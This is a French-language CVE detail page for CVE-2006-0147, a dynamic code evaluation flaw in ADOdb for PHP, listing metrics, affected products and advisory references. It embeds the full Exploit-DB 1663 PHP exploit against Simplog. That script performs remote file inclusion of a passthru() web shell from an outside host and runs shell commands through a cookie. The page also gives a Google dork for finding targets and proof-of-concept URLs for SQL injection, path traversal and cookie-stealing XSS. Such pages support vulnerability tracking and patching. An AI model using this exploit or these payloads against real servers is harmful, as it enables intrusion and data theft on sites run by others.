CVE-2006-0147 : Détail

CVE-2006-0147

3.95%V3
Network
2006-01-09
22h00 +00:00
2018-10-19
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Dynamic code evaluation vulnerability in tests/tmssql.php test script in ADOdb for PHP before 4.70, as used in multiple products including (1) Mantis, (2) PostNuke, (3) Moodle, (4) Cacti, (5) Xaraya, (6) PhpOpenChat, possibly (7) MAXdev MD-Pro, and (8) Simplog, allows remote attackers to execute arbitrary PHP functions via the do parameter, which is saved in a variable that is then executed as a function, as demonstrated using phpinfo.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 1663

Date de publication : 2006-04-10 22h00 +00:00
Auteur : rgod
EDB Vérifié : Yes

#!/usr/bin/php -q -d short_open_tag=on <? echo "Simplog <= 0.9.2 \"s\" remote cmmnds xctn\r\n"; echo "by rgod rgod@autistici.org\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "dork: intext:\"Powered by simplog\"\r\n\r\n"; if ($argc<5) { echo "Usage: php ".$argv[0]." host path location cmd OPTIONS\r\n"; echo "host: target server (ip/hostname)\r\n"; echo "path: path to simplog\r\n"; echo "location: an arbitrary location with the code to include\r\n"; echo "cmd: a shell command\r\n"; echo "Options:\r\n"; echo " -p[port]: specify a port other than 80\r\n"; echo " -P[ip:port]: specify a proxy\r\n"; echo "Examples:\r\n"; echo "php ".$argv[0]." localhost /simplog/ http://somehost.com ls -la\r\n"; echo "php ".$argv[0]." localhost /simplog/ http://somehost.com/subdir ls -la -p81\r\n"; echo "php ".$argv[0]." localhost / http://somehost.com cat ./../config.php -P1.1.1.1:80\r\n\r\n"; echo "note, you need this code in http://somehost.com/suntzu.html:\r\n"; echo "<?php\r\n"; echo "if (get_magic_quotes_gpc()){\$_REQUEST[\"cmd\"]=stripslashes(\$_REQUEST[\"cmd\"]);}\r\n"; echo "ini_set(\"max_execution_time\",0);\r\n"; echo "echo \"*delim*\";\r\n"; echo "passthru(\$_REQUEST[\"cmd\"]);\r\n"; echo "echo \"*delim*\";\r\n"; echo "?>\r\n"; die; } /* software site: http://www.simplog.org/ description: "Simplog provides an easy way for users to add blogging capabilities to their existing websites. Simplog is written in PHP and compatible with multiple databases. Simplog also features an RSS/Atom aggregator/reader. Powerful, yet simple......." i) vulnerable code in doc/index.php at lines: ... <?php if(isset($_REQUEST['s'])) { include($_REQUEST['s'].".html"); } ?> ... nice code, isn't it? :) poc: http://[target]/[path]/doc/index.php?cmd=ls%20-la&s=http://somehost.com/suntzu (but you can submit arguments even trough cookies or POST data...) or: http://[target]/[path]/doc/index.php?s=../../../../var/httpd/logs/error_log%00 ii) http://[target]/[path]/index.php?blogid=[sql] http://[target]/[path]/archive.php?blogid=[sql] http://[target]/[path]/archive.php?m=[sql] http://[target]/[path]/archive.php?y=[sql] iii) http://[target]/[path]/adodb/server.php?sql=[sql] http://[target]/[path]/adodb/tests/tmssql.php?do=phpinfo iv) xss: http://[target]/[path]/login.php?btag=<script>alert(document.cookie)</script> this is the exploit for i), works with allow_url_fopen = On */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } $host=$argv[1]; $path=$argv[2]; $loc=$argv[3]; if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/')) {die("Check the path, it must begin and end with a trailing slash\r\n");} $port=80; $proxy=""; $cmd=""; for ($i=4; $i<=$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) { $cmd.=" ".$argv[$i]; } if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } $cmd=urlencode($cmd); if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;} $packet ="GET ".$p."doc/index.php HTTP/1.0\r\n"; $packet.="User-Agent: Googlebot/2.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: s=".$loc."%2fsuntzu; cmd=".$cmd.";\r\n"; //through cookies, log this :) $packet.="Connection: Close\r\n\r\n"; #debug #echo quick_dump($packet); sendpacketii($packet); if (strstr($html,"*delim*")) {$temp=explode("*delim*",$html); echo "Exploit succeeded...\r\n\r\n"; echo $temp[1]; } else { #debug echo $html."\r\n"; echo "Exploit failed..."; } ?> # milw0rm.com [2006-04-11]

Products Mentioned

Configuraton 0

John_lim>>Adodb >> Version 4.66

    John_lim>>Adodb >> Version 4.68

      Mantis>>Mantis >> Version 0.19.4

        Mantis>>Mantis >> Version 1.0.0_rc4

          Moodle>>Moodle >> Version 1.5.3

          Postnuke_software_foundation>>Postnuke >> Version 0.761

            The_cacti_group>>Cacti >> Version 0.8.6g

              Références

              http://secunia.com/advisories/19590
              Tags : third-party-advisory, x_refsource_SECUNIA
              http://secunia.com/advisories/18267
              Tags : third-party-advisory, x_refsource_SECUNIA
              http://secunia.com/advisories/18254
              Tags : third-party-advisory, x_refsource_SECUNIA
              http://secunia.com/advisories/19555
              Tags : third-party-advisory, x_refsource_SECUNIA
              http://www.debian.org/security/2006/dsa-1029
              Tags : vendor-advisory, x_refsource_DEBIAN
              http://secunia.com/advisories/19628
              Tags : third-party-advisory, x_refsource_SECUNIA
              http://www.debian.org/security/2006/dsa-1030
              Tags : vendor-advisory, x_refsource_DEBIAN
              http://www.vupen.com/english/advisories/2006/1305
              Tags : vdb-entry, x_refsource_VUPEN
              http://secunia.com/advisories/18276
              Tags : third-party-advisory, x_refsource_SECUNIA
              http://secunia.com/advisories/19600
              Tags : third-party-advisory, x_refsource_SECUNIA
              https://www.exploit-db.com/exploits/1663
              Tags : exploit, x_refsource_EXPLOIT-DB
              http://www.vupen.com/english/advisories/2006/0103
              Tags : vdb-entry, x_refsource_VUPEN
              http://secunia.com/advisories/19591
              Tags : third-party-advisory, x_refsource_SECUNIA
              http://secunia.com/advisories/17418
              Tags : third-party-advisory, x_refsource_SECUNIA
              http://secunia.com/advisories/19691
              Tags : third-party-advisory, x_refsource_SECUNIA
              http://www.vupen.com/english/advisories/2006/0102
              Tags : vdb-entry, x_refsource_VUPEN
              http://www.vupen.com/english/advisories/2006/0101
              Tags : vdb-entry, x_refsource_VUPEN
              http://secunia.com/advisories/18233
              Tags : third-party-advisory, x_refsource_SECUNIA
              http://www.vupen.com/english/advisories/2006/1332
              Tags : vdb-entry, x_refsource_VUPEN
              http://www.osvdb.org/22291
              Tags : vdb-entry, x_refsource_OSVDB
              http://www.debian.org/security/2006/dsa-1031
              Tags : vendor-advisory, x_refsource_DEBIAN
              http://www.vupen.com/english/advisories/2006/0104
              Tags : vdb-entry, x_refsource_VUPEN
              http://secunia.com/advisories/18260
              Tags : third-party-advisory, x_refsource_SECUNIA
              http://www.gentoo.org/security/en/glsa/glsa-200604-07.xml
              Tags : vendor-advisory, x_refsource_GENTOO